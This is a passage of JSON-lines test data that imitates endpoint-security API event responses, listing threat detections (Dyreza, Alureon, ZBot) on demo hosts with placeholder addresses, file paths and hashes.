Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257409388904508","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900267000300,"timestamp":1610705459,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:10:59+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"Eldorado:Alureon-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705459,"start_date":"2021-01-15T10:10:59+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257357849297000,"timestamp":1610705456,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:10:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257357849296955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667064295457000,"timestamp":1610705453,"timestamp_nanoseconds":478000000,"date":"2021-01-15T10:10:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667064295456780","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257340669428000,"timestamp":1610705452,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:10:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257340669427770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667055705522000,"timestamp":1610705451,"timestamp_nanoseconds":565000000,"date":"2021-01-15T10:10:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667055705522187","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268414885822000,"timestamp":1610705411,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:10:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855181","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":810000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855180","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855179","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257087266357000,"timestamp":1610705393,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:09:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257087266357305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":469000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":344000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666793712517000,"timestamp":1610705390,"timestamp_nanoseconds":948000000,"date":"2021-01-15T10:09:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666793712517128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666785122583000,"timestamp":1610705388,"timestamp_nanoseconds":372000000,"date":"2021-01-15T10:09:48+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666785122582535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":596,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257040021717000,"timestamp":1610705382,"timestamp_nanoseconds":304000000,"date":"2021-01-15T10:09:42+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257040021717048","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256988482109000,"timestamp":1610705370,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:09:30+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256988482109495","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":782000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203910","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203909","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666694928269000,"timestamp":1610705367,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:09:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666694928269316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":2204,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256962712306000,"timestamp":1610705364,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:09:24+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256962712305718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617250006073000,"timestamp":1610705347,"timestamp_nanoseconds":296000000,"date":"2021-01-15T10:09:07+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617250006073346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":706000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat 
